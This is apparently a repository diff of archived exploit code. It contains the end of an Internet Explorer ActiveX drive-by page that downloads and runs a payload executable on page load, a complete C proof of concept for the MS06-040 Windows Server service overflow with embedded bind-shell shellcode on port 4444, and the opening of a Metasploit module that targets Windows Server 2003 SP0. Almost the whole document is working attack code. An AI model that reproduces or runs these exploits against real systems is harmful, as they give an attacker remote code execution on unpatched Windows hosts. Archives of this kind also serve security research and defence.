-
+
-	if (! r) {
+	if (! r) {
-		try { eval('r = o.GetObject("", n)') }catch(e){}
+		try { eval('r = o.GetObject("", n)') }catch(e){}
-	}
+	}
-	
+	
-	if (! r) {
+	if (! r) {
-		try { eval('r = o.GetObject(n, "")') }catch(e){}
+		try { eval('r = o.GetObject(n, "")') }catch(e){}
-	}
+	}
-	
+	
-	if (! r) {
+	if (! r) {
-		try { eval('r = o.GetObject(n)') }catch(e){}
+		try { eval('r = o.GetObject(n)') }catch(e){}
-	}
+	}
-	
+	
-	return(r);	
+	return(r);	
-}
+}
-
+
-function Go(a) {
+function Go(a) {
-	Log('Creating helper objects...');
+	Log('Creating helper objects...');
-	var s = CreateO(a, "WScript.Shell");
+	var s = CreateO(a, "WScript.Shell");
-	var o = CreateO(a, "ADODB.Stream");
+	var o = CreateO(a, "ADODB.Stream");
-	var e = s.Environment("Process");
+	var e = s.Environment("Process");
-	
+	
-	Log('Ceating the XMLHTTP object...');
+	Log('Ceating the XMLHTTP object...');
-	var url = document.location + '?payload';
+	var url = document.location + '?payload';
-	var xml = null;
+	var xml = null;
-	var bin = e.Item("TEMP") + "metasploit.exe";
+	var bin = e.Item("TEMP") + "metasploit.exe";
-	var dat; 
+	var dat; 
-	
+	
-	try { xml=new XMLHttpRequest(); }
+	try { xml=new XMLHttpRequest(); }
-	catch(e) {
+	catch(e) {
-		try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
+		try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
-		catch(e) {
+		catch(e) {
-			xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
+			xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
-		}
+		}
-	}
+	}
-	
+	
-	if (! xml) return(0);
+	if (! xml) return(0);
-
+
-	Log('Downloading the payload...');	
+	Log('Downloading the payload...');	
-	xml.open("GET", url, false)
+	xml.open("GET", url, false)
-	xml.send(null);
+	xml.send(null);
-	dat = xml.responseBody;
+	dat = xml.responseBody;
-
+
-	Log('Writing the payload to disk...');	
+	Log('Writing the payload to disk...');	
-	o.Type = 1;
+	o.Type = 1;
-	o.Mode = 3;
+	o.Mode = 3;
-	o.Open();
+	o.Open();
-	o.Write(dat);
+	o.Write(dat);
-	o.SaveToFile(bin, 2);
+	o.SaveToFile(bin, 2);
-
+
-	Log('Executing the payload...');		
+	Log('Executing the payload...');		
-	s.Run(bin,0);
+	s.Run(bin,0);
-}
+}
-
+
-function Exploit() {
+function Exploit() {
-	var i = 0;
+	var i = 0;
-	var t = new Array(${objects}null);
+	var t = new Array(${objects}null);
-	
+	
-	while (t[i]) {
+	while (t[i]) {
-		var a = null;
+		var a = null;
-		
+		
-		if (t[i].substring(0,1) == '{') {
+		if (t[i].substring(0,1) == '{') {
-			a = document.createElement("object");
+			a = document.createElement("object");
-			a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
+			a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
-		} else {
+		} else {
-			try { a = new ActiveXObject(t[i]); } catch(e){}
+			try { a = new ActiveXObject(t[i]); } catch(e){}
-		}
+		}
-		
+		
-		if (a) {
+		if (a) {
-			try {		
+			try {		
-				var b = CreateO(a, "WScript.Shell");
+				var b = CreateO(a, "WScript.Shell");
-				if (b) {
+				if (b) {
-					Log('Loaded ' + t[i]);
+					Log('Loaded ' + t[i]);
-					Go(a);
+					Go(a);
-					return(0);
+					return(0);
-				}
+				}
-			} catch(e){}
+			} catch(e){}
-		}
+		}
-		i++;
+		i++;
-	}
+	}
-	Log('Exploit failed.');
+	Log('Exploit failed.');
-}
+}
-</script>
+</script>
-</head>
+</head>
-<body onload='Exploit()'>
+<body onload='Exploit()'>
-<p>Initializing...</p>
+<p>Initializing...</p>
-</body>
+</body>
-</html>
+</html>
-#;
+#;
-}
+}
-
+
-sub BuildResponse {
+sub BuildResponse {
-	my ($self, $content, $type) = @_;
+	my ($self, $content, $type) = @_;
-	$type ||= 'text/plain';
+	$type ||= 'text/plain';
-
+
-	my $response =
+	my $response =
-	  "HTTP/1.1 200 OK\r\n" .
+	  "HTTP/1.1 200 OK\r\n" .
-	  "Content-Type: $type\r\n";
+	  "Content-Type: $type\r\n";
-
+
-	if ($self->GetVar('Gzip')) {
+	if ($self->GetVar('Gzip')) {
-		$response .= "Content-Encoding: gzip\r\n";
+		$response .= "Content-Encoding: gzip\r\n";
-		$content = $self->Gzip($content);
+		$content = $self->Gzip($content);
-	}
+	}
-	if ($self->GetVar('Chunked')) {
+	if ($self->GetVar('Chunked')) {
-		$response .= "Transfer-Encoding: chunked\r\n";
+		$response .= "Transfer-Encoding: chunked\r\n";
-		$content = $self->Chunk($content);
+		$content = $self->Chunk($content);
-	} else {
+	} else {
-		$response .= 'Content-Length: ' . length($content) . "\r\n" .
+		$response .= 'Content-Length: ' . length($content) . "\r\n" .
-		  "Connection: close\r\n";
+		  "Connection: close\r\n";
-	}
+	}
-
+
-	$response .= "\r\n" . $content;
+	$response .= "\r\n" . $content;
-
+
-	return $response;
+	return $response;
-}
+}
-
+
-sub Chunk {
+sub Chunk {
-	my ($self, $content) = @_;
+	my ($self, $content) = @_;
-
+
-	my $chunked;
+	my $chunked;
-	while (length($content)) {
+	while (length($content)) {
-		my $chunk = substr($content, 0, int(rand(10) + 1), '');
+		my $chunk = substr($content, 0, int(rand(10) + 1), '');
-		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
-	}
+	}
-	$chunked .= "0\r\n\r\n";
+	$chunked .= "0\r\n\r\n";
-
+
-	return $chunked;
+	return $chunked;
-}
+}
-
+
-sub Gzip {
+sub Gzip {
-	my $self = shift;
+	my $self = shift;
-	my $data = shift;
+	my $data = shift;
-	my $comp = int(rand(5))+5;
+	my $comp = int(rand(5))+5;
-
+
-	my($wtr, $rdr, $err);
+	my($wtr, $rdr, $err);
-
+
-	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
-	print $wtr $data;
+	print $wtr $data;
-	close ($wtr);
+	close ($wtr);
-	local $/;
+	local $/;
-
+
-	return (<$rdr>);
+	return (<$rdr>);
-}
+}
-
+
-1;
+1;
-
+
-# milw0rm.com [2006-08-10]
+# milw0rm.com [2006-08-10]
--- a/platforms/windows/remote/2223.c
+++ b/platforms/windows/remote/2223.c
--- a/platforms/windows/remote/2265.c
+++ b/platforms/windows/remote/2265.c
@ -1,180 +1,180 @@
-/*
+/*
- * MS06-040 Remote Code Execution Proof of Concept
+ * MS06-040 Remote Code Execution Proof of Concept
- *
+ *
- * Ported by ub3r st4r aka iRP
+ * Ported by ub3r st4r aka iRP
- * ---------------------------------------------------------------------
+ * ---------------------------------------------------------------------
- * Tested Against:
+ * Tested Against:
- *  Windows XP SP1
+ *  Windows XP SP1
- *  Windows 2000 SP4
+ *  Windows 2000 SP4
- *
+ *
- * Systems Affected:
+ * Systems Affected:
- *  Microsoft Windows 2000 SP0-SP4
+ *  Microsoft Windows 2000 SP0-SP4
- *  Microsoft Windows XP SP0-SP1
+ *  Microsoft Windows XP SP0-SP1
- *  Microsoft Windows NT 4.0
+ *  Microsoft Windows NT 4.0
- * ---------------------------------------------------------------------
+ * ---------------------------------------------------------------------
- * This is provided as proof-of-concept code only for educational
+ * This is provided as proof-of-concept code only for educational
- * purposes and testing by authorized individuals with permission
+ * purposes and testing by authorized individuals with permission
- * to do so.
+ * to do so.
- *
+ *
- * PRIVATE v.0.2 (08-27-06)
+ * PRIVATE v.0.2 (08-27-06)
- */
+ */
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-
+
-#pragma comment(lib, "mpr")
+#pragma comment(lib, "mpr")
-#pragma comment(lib, "Rpcrt4")
+#pragma comment(lib, "Rpcrt4")
-
+
-// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
+// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
-unsigned char DCERPC_Bind_RPC_Service[] =
+unsigned char DCERPC_Bind_RPC_Service[] =
-       "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
+       "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
-       "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+       "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-       "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
+       "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
-       "\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
+       "\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
-       "\x2B\x10\x48\x60\x02\x00\x00\x00";
+       "\x2B\x10\x48\x60\x02\x00\x00\x00";
-
+
-// request windows api: NetprPathCanonicalize (0x1f)
+// request windows api: NetprPathCanonicalize (0x1f)
-unsigned char DCERPC_Request_RPC_Service[] =
+unsigned char DCERPC_Request_RPC_Service[] =
-       "\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
+       "\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
-       "\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
+       "\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
-       "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";
+       "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";
-
+
-       // path ...
+       // path ...
-
+
-unsigned char DCERPC_Request_RPC_Service_[] =
+unsigned char DCERPC_Request_RPC_Service_[] =
-       "\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
+       "\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-       "\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00";
+       "\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00";
-
+
-unsigned char sc[] =
+unsigned char sc[] =
-       "\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90"
+       "\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90"
-       "\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c"
+       "\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c"
-       "\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb"
+       "\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb"
-       "\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c"
+       "\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c"
-       "\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c"
+       "\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c"
-       "\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc"
+       "\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc"
-       "\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c"
+       "\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c"
-       "\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff"
+       "\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff"
-       "\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4"
+       "\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4"
-       "\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72"
+       "\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72"
-       "\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0"
+       "\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0"
-       "\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86"
+       "\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86"
-       "\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87"
+       "\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87"
-       "\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47"
+       "\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47"
-       "\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff"
+       "\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff"
-       "\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4"
+       "\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4"
-       "\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57"
+       "\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57"
-       "\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff"
+       "\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff"
-       "\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd"
+       "\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd"
-       "\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd"
+       "\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd"
-       "\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47"
+       "\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47"
-       "\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58";
+       "\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58";
-
+
-int main(int argc, char* argv[])
+int main(int argc, char* argv[])
-{
+{
-       HANDLE hFile;
+       HANDLE hFile;
-       NETRESOURCE nr;
+       NETRESOURCE nr;
-
+
-       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
+       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
-
+
-       unsigned int i;
+       unsigned int i;
-
+
-       unsigned char szInBuf[4096];
+       unsigned char szInBuf[4096];
-       unsigned long dwRead, nWritten;
+       unsigned long dwRead, nWritten;
-
+
-       unsigned char szReqBuf[2096];
+       unsigned char szReqBuf[2096];
-
+
-       if (argc < 3){
+       if (argc < 3){
-               printf("[-] Usage: ms06040poc <host> [target]\n");
+               printf("[-] Usage: ms06040poc <host> [target]\n");
-               printf("\t1 - Windows 2000 SP0-SP4\n");
+               printf("\t1 - Windows 2000 SP0-SP4\n");
-               printf("\t2 - Windows XP SP0-SP1\n");
+               printf("\t2 - Windows XP SP0-SP1\n");
-               return -1;
+               return -1;
-       }
+       }
-
+
-       memset(szReqBuf, 0, sizeof(szReqBuf));
+       memset(szReqBuf, 0, sizeof(szReqBuf));
-
+
-       if (atoi(argv[2]) == 1) {
+       if (atoi(argv[2]) == 1) {
-               unsigned char szBuff[1064];
+               unsigned char szBuff[1064];
-
+
-               // build payload buffer
+               // build payload buffer
-               memset(szBuff, '\x90', 1000);
+               memset(szBuff, '\x90', 1000);
-               memcpy(szBuff+630, sc, sizeof(sc));
+               memcpy(szBuff+630, sc, sizeof(sc));
-
+
-               for(i=1000; i<1064; i+=4) {
+               for(i=1000; i<1064; i+=4) {
-                       memcpy(szBuff+i, "\x04\x08\x02\x00", 4);
+                       memcpy(szBuff+i, "\x04\x08\x02\x00", 4);
-               }
+               }
-
+
-               // build request buffer
+               // build request buffer
-               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
+               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
-               memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count */
+               memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count */
-               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
+               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
-               memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); /* actual count */
+               memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); /* actual count */
-               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
+               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
-               memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); /* align string */
+               memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); /* align string */
-               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
+               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
-               memcpy(szReqBuf+1140 , "\xeb\x02", 2);
+               memcpy(szReqBuf+1140 , "\xeb\x02", 2);
-       }
+       }
-       if (atoi(argv[2]) == 2) {
+       if (atoi(argv[2]) == 2) {
-               unsigned char szBuff[708];
+               unsigned char szBuff[708];
-
+
-               memset(szBuff, '\x90', 612); /* size of shellcode */
+               memset(szBuff, '\x90', 612); /* size of shellcode */
-               memcpy(szBuff, sc, sizeof(sc));
+               memcpy(szBuff, sc, sizeof(sc));
-
+
-               memcpy(szBuff+612, "\x0a\x08\x02\x00", 4);
+               memcpy(szBuff+612, "\x0a\x08\x02\x00", 4);
-               memset(szBuff+616, 'A', 8); // 8 bytes padding
+               memset(szBuff+616, 'A', 8); // 8 bytes padding
-               memcpy(szBuff+624, "\x04\x08\x02\x00", 4);
+               memcpy(szBuff+624, "\x04\x08\x02\x00", 4);
-               memset(szBuff+628, '\x90', 32);
+               memset(szBuff+628, '\x90', 32);
-               memcpy(szBuff+660, "\x04\x08\x02\x00", 4);
+               memcpy(szBuff+660, "\x04\x08\x02\x00", 4);
-               memset(szBuff+664, 'B', 8); // 8 bytes padding
+               memset(szBuff+664, 'B', 8); // 8 bytes padding
-               memcpy(szBuff+672, "\x04\x08\x02\x00", 4);
+               memcpy(szBuff+672, "\x04\x08\x02\x00", 4);
-               memset(szBuff+676, '\x90', 32);
+               memset(szBuff+676, '\x90', 32);
-
+
-               // build request buffer
+               // build request buffer
-               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
+               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
-               memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); /* max count */
+               memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); /* max count */
-               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
+               memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); /* offset */
-               memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); /* actual count */
+               memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); /* actual count */
-               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
+               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
-               memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); /* align string */
+               memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); /* align string */
-               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
+               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
-       }
+       }
-
+
-       printf("[+] Connecting to %s ... \n", argv[1]);
+       printf("[+] Connecting to %s ... \n", argv[1]);
-
+
-       _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]);
+       _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]);
-       nr.dwType = RESOURCETYPE_ANY;
+       nr.dwType = RESOURCETYPE_ANY;
-       nr.lpLocalName = NULL;
+       nr.lpLocalName = NULL;
-       nr.lpProvider = NULL;
+       nr.lpProvider = NULL;
-       nr.lpRemoteName = szRemoteName;
+       nr.lpRemoteName = szRemoteName;
-       if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
+       if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
-               printf("[-] Failed to connect to host !\n");
+               printf("[-] Failed to connect to host !\n");
-               return -1;
+               return -1;
-       }
+       }
-
+
-       _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]);
+       _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]);
-       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
-
+
-       if (hFile == INVALID_HANDLE_VALUE) {
+       if (hFile == INVALID_HANDLE_VALUE) {
-               printf("[-] Failed to open named pipe !\n");
+               printf("[-] Failed to open named pipe !\n");
-               return -1;
+               return -1;
-       }
+       }
-
+
-       printf("[+] Binding to RPC interface ... \n");
+       printf("[+] Binding to RPC interface ... \n");
-       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
+       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
-               printf("[-] Failed to bind to interface !\n");
+               printf("[-] Failed to bind to interface !\n");
-               CloseHandle(hFile);
+               CloseHandle(hFile);
-               return -1;
+               return -1;
-       }
+       }
-
+
-       printf("[+] Sending RPC request ... \n");
+       printf("[+] Sending RPC request ... \n");
-       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
+       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
-               printf("[-] Unable to transmit RPC request !\n");
+               printf("[-] Unable to transmit RPC request !\n");
-               CloseHandle(hFile);
+               CloseHandle(hFile);
-               return -1;
+               return -1;
-       }
+       }
-
+
-       printf("[+] Now check for shell on %s:4444 !\n", argv[1]);
+       printf("[+] Now check for shell on %s:4444 !\n", argv[1]);
-
+
-       return 0;
+       return 0;
-}
+}
-
+
-// milw0rm.com [2006-08-28]
+// milw0rm.com [2006-08-28]
--- a/platforms/windows/remote/2355.pm
+++ b/platforms/windows/remote/2355.pm
@ -1,233 +1,233 @@
-#########################################################################
+#########################################################################
-# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
+# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
-#
+#
-# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
+# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
-#
+#
-# http://sf-freedom.blogspot.com
+# http://sf-freedom.blogspot.com
-# 
+# 
-# For educational purpose only
+# For educational purpose only
-#
+#
-# Note: This exploit is developed because of my question "Is it exploitable
+# Note: This exploit is developed because of my question "Is it exploitable
-# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
+# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
-# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
+# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
-# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
+# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
-# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not 
+# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not 
-# exploitable ? There is Stack Protection Windows Server 2003, is this the
+# exploitable ? There is Stack Protection Windows Server 2003, is this the
-# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
+# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
-#
+#
-# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
+# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
-# ^-^) and work on it. The problem is the Stack Protection "security cookie 
+# ^-^) and work on it. The problem is the Stack Protection "security cookie 
-# checking". Because wcscpy() method allow me to write to any memory location
+# checking". Because wcscpy() method allow me to write to any memory location
-# that are marked writable, I decide to write to the location at "security
+# that are marked writable, I decide to write to the location at "security
-# cookie" is stored and it works !!! I will describe more implementation details
+# cookie" is stored and it works !!! I will describe more implementation details
-# in my blog in few days ^-^ 
+# in my blog in few days ^-^ 
-#
+#
-# This exploit tested on Windows Server 2003 SP0 build 3790 and successful 
+# This exploit tested on Windows Server 2003 SP0 build 3790 and successful 
-# exploit 2003 machine in my environment - all patch before MS06-040 
+# exploit 2003 machine in my environment - all patch before MS06-040 
-# (KB921883). It's quite reliable but not 100%. There is the possibility that
+# (KB921883). It's quite reliable but not 100%. There is the possibility that
-# the exploit will fail and the target system process crash. Because I have 
+# the exploit will fail and the target system process crash. Because I have 
-# only one testbase system, I couldn't confirm this exploit will work on 
+# only one testbase system, I couldn't confirm this exploit will work on 
-# your environment. However feel free to e-mail to me.
+# your environment. However feel free to e-mail to me.
-#
+#
-# Credits: H D Moore
+# Credits: H D Moore
-#########################################################################
+#########################################################################
-
+
-package Msf::Exploit::netapi_win2003;
+package Msf::Exploit::netapi_win2003;
-use base "Msf::Exploit";
+use base "Msf::Exploit";
-use strict;
+use strict;
-
+
-use Pex::DCERPC;
+use Pex::DCERPC;
-use Pex::NDR;
+use Pex::NDR;
-
+
-my $advanced = {
+my $advanced = {
-	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
+	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
-	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
+	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
-	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
+	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
-  };
+  };
-
+
-my $info = {
+my $info = {
-	'Name'    => 'MSO6-040 Windows Server 2003 Target',
+	'Name'    => 'MSO6-040 Windows Server 2003 Target',
-	'Version' => '',
+	'Version' => '',
-	'Authors' =>
+	'Authors' =>
-	  [
+	  [
-		'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
+		'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
-	  ],
+	  ],
-
+
-	'Arch' => ['x86'],
+	'Arch' => ['x86'],
-	'OS'   => [ 'win32', 'win2003' ],
+	'OS'   => [ 'win32', 'win2003' ],
-	'Priv' => 1,
+	'Priv' => 1,
-
+
-	'AutoOpts' => { 'EXITFUNC' => 'thread' },
+	'AutoOpts' => { 'EXITFUNC' => 'thread' },
-	
+	
-	'UserOpts' =>
+	'UserOpts' =>
-	  {
+	  {
-		'RHOST' => [ 1, 'ADDR', 'The target address' ],
+		'RHOST' => [ 1, 'ADDR', 'The target address' ],
-
+
-		# SMB connection options
+		# SMB connection options
-		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
+		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
-		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
+		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
-		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
+		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
-	  },
+	  },
-
+
-	'Payload' =>
